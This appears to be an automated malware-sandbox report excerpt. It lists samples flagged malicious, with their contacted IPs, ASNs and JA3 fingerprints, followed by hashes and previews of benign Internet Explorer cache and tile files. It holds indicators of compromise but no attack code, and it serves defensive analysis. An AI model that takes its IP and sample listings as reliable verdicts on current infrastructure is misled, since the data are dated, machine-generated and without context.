	SecuriteInfo.com.Generic.mg.b817172e5515b1af.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Generic.mg.40626f903857672d.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.ArtemisAA8578417627.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Artemis58690C2E2BCA.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.ArtemisTrojan.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Generic.mg.0551f32bbe68c20b.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Artemis961F6F63FB8F.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Generic.mg.11330b175b08895e.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Generic.mg.284f325559f6aab1.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Generic.mg.bde322c970c26175.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Generic.mg.37caa465917f6353.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Generic.mg.1bd97bbb2b7b26c4.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Generic.mg.441cc21491bf0823.dll	Get hash	malicious	Browse	151.101.1.44

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
FASTLYUS	xDKOaCQQTQ.dll	Get hash	malicious	Browse	151.101.1.44
	4bEUfowOcg.dll	Get hash	malicious	Browse	151.101.1.44
	QT21006189.exe	Get hash	malicious	Browse	151.101.0.133
	crypt_l_32.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Artemis5EFC4C46397A.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Generic.mg.75b2def6a7e110ad.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Generic.mg.32d178838c0fd41b.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Artemis8353855AD729.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Generic.mg.b817172e5515b1af.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Generic.mg.40626f903857672d.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.ArtemisAA8578417627.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Artemis58690C2E2BCA.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.ArtemisTrojan.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Generic.mg.0551f32bbe68c20b.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Artemis961F6F63FB8F.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Generic.mg.11330b175b08895e.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Generic.mg.284f325559f6aab1.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Generic.mg.bde322c970c26175.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Generic.mg.37caa465917f6353.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Generic.mg.1bd97bbb2b7b26c4.dll	Get hash	malicious	Browse	151.101.1.44
SPECTRAIPSpectraIPBVNL	out.dll	Get hash	malicious	Browse	45.138.24.6
	crypt_3300.dll	Get hash	malicious	Browse	45.138.24.6
	SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll	Get hash	malicious	Browse	45.138.24.6
	Online_doc20.01.exe	Get hash	malicious	Browse	45.14.226.121
	P4fZLHrU6d.exe	Get hash	malicious	Browse	45.14.226.101

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
9e10692f1b7f78228b2d4e424db3a98c	xDKOaCQQTQ.dll	Get hash	malicious	Browse	151.101.1.44
	4bEUfowOcg.dll	Get hash	malicious	Browse	151.101.1.44
	The Mental Health Center.xlsx	Get hash	malicious	Browse	151.101.1.44
	crypt_l_32.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Generic.mg.b70d9bf0d6567964.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Artemis5EFC4C46397A.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Generic.mg.75b2def6a7e110ad.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Generic.mg.32d178838c0fd41b.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Artemis8353855AD729.dll	Get hash	malicious	Browse	151.101.1.44
	Monday, January 25, 2021 222135-ATT+723086453088056636775.htm	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Generic.mg.b817172e5515b1af.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Generic.mg.40626f903857672d.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.ArtemisAA8578417627.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Artemis58690C2E2BCA.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.ArtemisTrojan.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Generic.mg.0551f32bbe68c20b.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Artemis961F6F63FB8F.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Generic.mg.11330b175b08895e.dll	Get hash	malicious	Browse	151.101.1.44
	PAYMENT INFO.xlsx	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Generic.mg.284f325559f6aab1.dll	Get hash	malicious	Browse	151.101.1.44

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\IUHEMSR9\contextual.media[1].xml Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	2914
Entropy (8bit):	4.961604295795146
Encrypted:	false
SSDEEP:	48:LoHoHoHoHvHvUHvHvyHvHrHrHrHgHgHgJkCZHgJkCZHgJkCZHgJkCZIHgJkCZA2t:kIIIPPUPPyPLLLAAAJkCZAJkCZAJkCZu
MD5:	DC4E1831691F9F776A24FC240C0E2079
SHA1:	306C5FC8C9A8B65EF6EAA0CE102642E29DAEF3B5
SHA-256:	895E7C2AA46367B6883A19881A74749FCF6BA3595E0C3BC1C6AA239E909253DE
SHA-512:	1E2B5E2D7DE2ECF57A18B79E736249ADA6F36F4CA7CDB69AC4C007D4F3B49CB12BA9FE2277DF34A43E578B0E85F282386FD3A79863F77327AFC89327639E96A9
Malicious:	false
Preview:	<root></root><root><item name="HBCM_BIDS" value="{}" ltime="2929638512" htime="30864478" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2929638512" htime="30864478" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2929638512" htime="30864478" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2929638512" htime="30864478" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2929798512" htime="30864478" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2929798512" htime="30864478" /><item name="mntest" value="mntest" ltime="2929878512" htime="30864478" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2929798512" htime="30864478" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2929798512" htime="30864478" /><item name="mntest" value="mntest" ltime="2932238512" htime="30864478" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2929798512" htime="30864478" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2933638512" htime="30864478"

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\T8DRMTJ1\www.msn[2].xml Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	13
Entropy (8bit):	2.469670487371862
Encrypted:	false
SSDEEP:	3:D90aKb:JFKb
MD5:	C1DDEA3EF6BBEF3E7060A1A9AD89E4C5
SHA1:	35E3224FCBD3E1AF306F2B6A2C6BBEA9B0867966
SHA-256:	B71E4D17274636B97179BA2D97C742735B6510EB54F22893D3A2DAFF2CEB28DB
SHA-512:	6BE8CEC7C862AFAE5B37AA32DC5BB45912881A3276606DA41BF808A4EF92C318B355E616BF45A257B995520D72B7C08752C0BE445DCEADE5CF79F73480910FED
Malicious:	false
Preview:	<root></root>

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{E9735B9C-6051-11EB-90E6-ECF4BB82F7E0}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	107304
Entropy (8bit):	2.2842909003108214
Encrypted:	false
SSDEEP:	384:rMJBRUsfn8w0rDQS8edgTa43tLxMyrLT6:f
MD5:	BFFB3701064C0A783B7C1B453520CE7E
SHA1:	934875893A0B902652CF479059EFCF8C2E29DEE4
SHA-256:	CA0B25C76D3D824B8D1B4700126CDB5F26990DF80716A7D6EA14488B852B76C5
SHA-512:	F810315875DF4A2E3FE4256C82CA4072134D1555048B36135738C17F3509910C1E936690FED08E53EBD61FF78931FE24944AB7E25C921E1BA904699C88DD4BC2
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{0631AB9B-6052-11EB-90E6-ECF4BB82F7E0}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	28168
Entropy (8bit):	1.9286774120673393
Encrypted:	false
SSDEEP:	192:reZ1QQ6QxkZFjfV2gkW2M6YBUbSlLb9KyA:rqq7rZhkkf6IUbSLbUF
MD5:	AA8EF9FF10ECD5AA01BA1D6339B0BB19
SHA1:	728BE2299686776833DDB8E4FDE968B1564DD242
SHA-256:	70F8A280D73A8C136C63502BA0050B7ACEFDACC034CF9151F9EF47F09DCAA67C
SHA-512:	27CDFE1576A5EF6340819E9F9F6A0E6944296CD962BD8D6EF859A27FCC13C47C59765F02129895DEC633549EE083E2CC440AED898FE6BC670287EF118B06EE52
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{0631AB9D-6052-11EB-90E6-ECF4BB82F7E0}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	28696
Entropy (8bit):	1.92134763100001
Encrypted:	false
SSDEEP:	192:rxZWQL6NktFjR2ckWjMCYR79YMEMA9YAr:r3jO2thAIgCY7ewAeo
MD5:	038D4BE1F06E28AC56647B38DD499D13
SHA1:	FD41F6A0181F1B84DAE0D6AC1EE42D510A44FA09
SHA-256:	3325623ABD1845447C00B26FF944F68A2F747418AD6CC5253F5EA75B01E7B6F8
SHA-512:	7A43F467E60E61D57342E7E1582D56F5919EE4FEE9441BCF95C7526D7D44F10F120CFEC43E22D926B6DD94440BD8BC08F9045EF8C4D2B359DD68B118E1FD1B5C
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{1136F6F8-6052-11EB-90E6-ECF4BB82F7E0}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	28148
Entropy (8bit):	1.9211928865145094
Encrypted:	false
SSDEEP:	192:rKZdQZ6jkWFjR2gkWwMHYF6jiw9u/0sd16qjiw9u/0NGA:r2i0oWhAkFHs2OHTzR
MD5:	8E347E0DC20B923407CB0D0F344828A8
SHA1:	2FE0EC2B55F51F8419121FD501FC7943DC3C2733
SHA-256:	5B0F6ABC60386BDC0983900074EFA2F497C10D7DD4407C460A8BCF9C09AEE33B
SHA-512:	E6BAB75B2338E49048365A4B9D9A0DB858D1270CA604489084A3A43C410C25CAB604A384076B458D7086C1B7B0D3BA775FC7C249FED9923CCE514B6A71D16E93
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{19D679DB-6052-11EB-90E6-ECF4BB82F7E0}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	19032
Entropy (8bit):	1.5846879171314059
Encrypted:	false
SSDEEP:	48:IwUGcprJGwpa1G4pQRGrapbSqurGQpKNG7HpRlsTGIpX2aGApm:rIZjQn6hBSquFAsTl4Fhg
MD5:	81DD56469154C565BDD0B09EA14DAA8A
SHA1:	F2926B365634EC93BAABB9306134D04DA9F62A13
SHA-256:	BD536AAEF6CED63246EAF3983EFDECDA030ED6CF310D069739E1933BE5EBB126
SHA-512:	4A7AA453B10852030C87495F3C00423A0BC331BA7939999B2FFCDE1094792702839A85A131AEC326D87A96C89008BA4C1979B40697F7D1B4BFD1D631C4F7E09A
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{E9735B9E-6051-11EB-90E6-ECF4BB82F7E0}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	194358
Entropy (8bit):	3.5870150177823197
Encrypted:	false
SSDEEP:	3072:ihZ/2BfcYmu5kLTzGt5Z/2Bfc/mu5kLTzGtS:VYN
MD5:	942C40333DDE9C525965BFED5A771782
SHA1:	2D08D5EC1783BC34A1A936E604C407F12E0A8B16
SHA-256:	B40612CA8A555FCD610009D0C96F0FFCD5E9C01AEF14072ED3BB267A7B692D49
SHA-512:	F5AB5B45FEFB063084669050C5F7F4A16DC9492A02B14C0D0EB5DBDF181D5EC23D12ACB3017025B7A0CA77C6FBF3B971F9B8AF8F52FB6F53BD008C9D26EE9A44
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	660
Entropy (8bit):	5.084341224927129
Encrypted:	false
SSDEEP:	12:TMHdNMNxOEt0w5NnWimI002EtM3MHdNMNxOEt0w5NnWimI00OYVbkEtMb:2d6NxOk0wLSZHKd6NxOk0wLSZ7xb
MD5:	549A9E9F7C5D569909BE9404ECCD0D0A
SHA1:	FDC31DDCB299241F930F2FAA1EDA88377BD32A0E
SHA-256:	A954735DBC9E13FB498B49B22D50206243A2769C592C932C67CDDB4214162F4C
SHA-512:	BE08A250098E1B1ACC00576CE5A474181090CE3E4FB760155017684D4DF60CD8AD2D62F137B15CA5DA0293BD681FC3AD943A95D1C5F10794A06E64A78429A15D
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xbfe642ae,0x01d6f45e</date><accdate>0xbfe642ae,0x01d6f45e</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xbfe642ae,0x01d6f45e</date><accdate>0xbfe642ae,0x01d6f45e</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	657
Entropy (8bit):	5.112843863401286
Encrypted:	false
SSDEEP:	12:TMHdNMNxe2knA6dNnWimI002EtM3MHdNMNxe2knA6dNnWimI00OYkak6EtMb:2d6NxrmA6vSZHKd6NxrmA6vSZ7Ja7b
MD5:	B42768EC22969E88016E83366C69FDF9
SHA1:	A7A2ABC275289EBFD465A9068EB351AACB9979C4
SHA-256:	B25356827845E37ADA07986F3650210116BF06CC61844DD98E364103830D9D67
SHA-512:	5C166B89D9F5EC5E166E5F5960FEC423CA39AE1797EF9B432E43F8D2D1D5F4DECAC35460B415D2AA987BDFD8BF5084C6196CC9DDBAD84F0C1C3AD8BA59463DB6
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0xbfdf1b9c,0x01d6f45e</date><accdate>0xbfdf1b9c,0x01d6f45e</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0xbfdf1b9c,0x01d6f45e</date><accdate>0xbfdf1b9c,0x01d6f45e</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	666
Entropy (8bit):	5.09944246856251
Encrypted:	false
SSDEEP:	12:TMHdNMNxvLt0w5NnWimI002EtM3MHdNMNxvLt0w5NnWimI00OYmZEtMb:2d6Nxv50wLSZHKd6Nxv50wLSZ7Zb
MD5:	F77C3A3C3F0982AB922A845C651CBACB
SHA1:	329D03798A499F6AA7583EEB7A2F9F3337A48902
SHA-256:	766AAA528087F9979A6EEF7B4228432CE9401ED04FEE7013E6096CF0D991F944
SHA-512:	4883405009F0E78EF49BE8C2594C340C6E9FED6AA599100235F0A859AEB332F57791C69CA51F348563CB594FFB8D97AEF9602E51539447F15D44AD745222129D
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0xbfe642ae,0x01d6f45e</date><accdate>0xbfe642ae,0x01d6f45e</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0xbfe642ae,0x01d6f45e</date><accdate>0xbfe642ae,0x01d6f45e</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	651
Entropy (8bit):	5.076514146969856
Encrypted:	false
SSDEEP:	12:TMHdNMNxiA+NnWimI002EtM3MHdNMNxiA+NnWimI00OYd5EtMb:2d6NxXwSZHKd6NxXwSZ7qjb
MD5:	91B1FD2B6D6EBFBBF0655BA7F0902F7C
SHA1:	DF48916E0C62D678CE9E5C321E363F9403FD119F
SHA-256:	5AF897D127888362B736B0F073E344ECA7001B587777702E20E35AE145BC7497
SHA-512:	DB069AF4B9BDA1F9F296E435975BC557E6B897242B1093DAAF143E1ED0F371527DCCB56695794CC160B9461B904FB0D1F2179427DF5C2F8EDEF0FED5CF6F847B
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0xbfe3e053,0x01d6f45e</date><accdate>0xbfe3e053,0x01d6f45e</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0xbfe3e053,0x01d6f45e</date><accdate>0xbfe3e053,0x01d6f45e</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	660
Entropy (8bit):	5.11334098758519
Encrypted:	false
SSDEEP:	12:TMHdNMNxhGwiYNnWimI002EtM3MHdNMNxhGwiYNnWimI00OY8K075EtMb:2d6NxQTeSZHKd6NxQTeSZ7RKajb
MD5:	2D2F539DCDDA060054B569C020DC0D66
SHA1:	4584E04FBB6C9A24B6B572C824CDD180C12A83EB
SHA-256:	EF9EEE621ECDD8916341F1DA63F3648B6FD007D2C63DA57F548F6768DE543FEC
SHA-512:	4ECD9E2C5A13E5EBBE14899465D21E1792669BD518C31DF85CF36730109BD3AFD0FA34D2D2EAEBF12F81E8218E649BD77985F50D1967282B027AD152DB7F7219
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xbfe8a4f7,0x01d6f45e</date><accdate>0xbfe8a4f7,0x01d6f45e</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xbfe8a4f7,0x01d6f45e</date><accdate>0xbfe8a4f7,0x01d6f45e</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	657
Entropy (8bit):	5.087750765404467
Encrypted:	false
SSDEEP:	12:TMHdNMNx0nt0w5NnWimI002EtM3MHdNMNx0nt0w5NnWimI00OYxEtMb:2d6Nx0t0wLSZHKd6Nx0t0wLSZ7+b
MD5:	9B6B985577DB643D263972D3A911E8A0
SHA1:	5355022F787164F9B2CCB4A16702281E449D49CF
SHA-256:	F00BEAC9F2483D4400368A01F65113D84264DF72612DC63618DFF16046B55817
SHA-512:	8C980967244A251CE7A7FFE6EF958EF90DAD52A968F47F5DECB7AF689F9F7D9ABB78744A5AB3F59DFB7453C670F6A06E8F193DBDE7C700C2C082A52E5F7EE719
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0xbfe642ae,0x01d6f45e</date><accdate>0xbfe642ae,0x01d6f45e</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0xbfe642ae,0x01d6f45e</date><accdate>0xbfe642ae,0x01d6f45e</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	660
Entropy (8bit):	5.100950583010276
Encrypted:	false
SSDEEP:	12:TMHdNMNxxA+NnWimI002EtM3MHdNMNxxA+NnWimI00OY6Kq5EtMb:2d6NxuwSZHKd6NxuwSZ7Xb
MD5:	79F22C1E6EDD658BD056FF697D91CC79
SHA1:	19B0E10778E565950403A09716DB245117A4C70A
SHA-256:	28576E40E38E8DCA5D17FB2D3013F1CDB08708695E3CB701DFF770540EF06911
SHA-512:	E5E31AA6F7E08561FE5D9EC716FAC5644F4F3A13F5F64157D0EEF64969E3B3EEA4372B51BCF43DE0F71DD1D478DFFA8D3DAB7B44143B1DF507A07D39F96EF1C4
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0xbfe3e053,0x01d6f45e</date><accdate>0xbfe3e053,0x01d6f45e</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0xbfe3e053,0x01d6f45e</date><accdate>0xbfe3e053,0x01d6f45e</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	663
Entropy (8bit):	5.060240919960796
Encrypted:	false
SSDEEP:	12:TMHdNMNxc06NnWimI002EtM3MHdNMNxc06NnWimI00OYVEtMb:2d6NxpMSZHKd6NxpMSZ7Gb
MD5:	DCC4F8D1A7312D115E18E3166F63847C
SHA1:	4CEAA027F048D12BC3C498329D4A2728E8C3535E
SHA-256:	B96E0326E1C98BF10890ECB7D8A704A555A9EDF77EA21D06342CCEC79BC11BD1
SHA-512:	282202728801A981EDB01020997C514168A0ADDFA442B80E7DD35168533FFB8A4DB1D4076B14F5E6441B58948073EBDA2C8D55B279152F54820BA1A5215CF805
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xbfe17e0a,0x01d6f45e</date><accdate>0xbfe17e0a,0x01d6f45e</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xbfe17e0a,0x01d6f45e</date><accdate>0xbfe17e0a,0x01d6f45e</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	657
Entropy (8bit):	5.062327683559668
Encrypted:	false
SSDEEP:	12:TMHdNMNxfnA+NnWimI002EtM3MHdNMNxfnA+NnWimI00OYe5EtMb:2d6NxowSZHKd6NxowSZ7Fjb
MD5:	0EEDF1FFD5970837E053BC6440C86207
SHA1:	DDC487F012EE90A88DF09B70504055AC54011BEF
SHA-256:	D013BCBA9822B03ACFA3D95E0CEAFDE6F5B1D01B4D1B5A0B17DCAC3DC3E12D1D
SHA-512:	649302424D1CAFAE5740AC4C4EB498D19E181D998CAF6F7C16941375EC28C7359E8312D27F798CCFE3E6D9FF9D2D20066AFF4079EC97033C69C28714C42F438E
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0xbfe3e053,0x01d6f45e</date><accdate>0xbfe3e053,0x01d6f45e</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0xbfe3e053,0x01d6f45e</date><accdate>0xbfe3e053,0x01d6f45e</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\po60zt0\imagestore.dat Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	934
Entropy (8bit):	7.0316726630425155
Encrypted:	false
SSDEEP:	24:u6tWaF/6easyD/iCHLSWWqyCoTTdTc+yhaX4b9upGgf:u6tWu/6symC+PTCq5TcBUX4bk
MD5:	55A78BA942B78AE6F262E21054F94896
SHA1:	46185D2B3A39C53163088CF51D7291CDC0F4B04F
SHA-256:	4A33E62D579A159BD21617F848B3A6BDDFE6B6BE4BFA5793C867EDA69CFE14FD
SHA-512:	C79674295A9B5D45EB84449F71B58316C0F7F83D57B913D7E234637C11832BDE94702466688D04D097ECEE12664541397B170C368EE4BA71F3C471DC51875B93
Malicious:	false
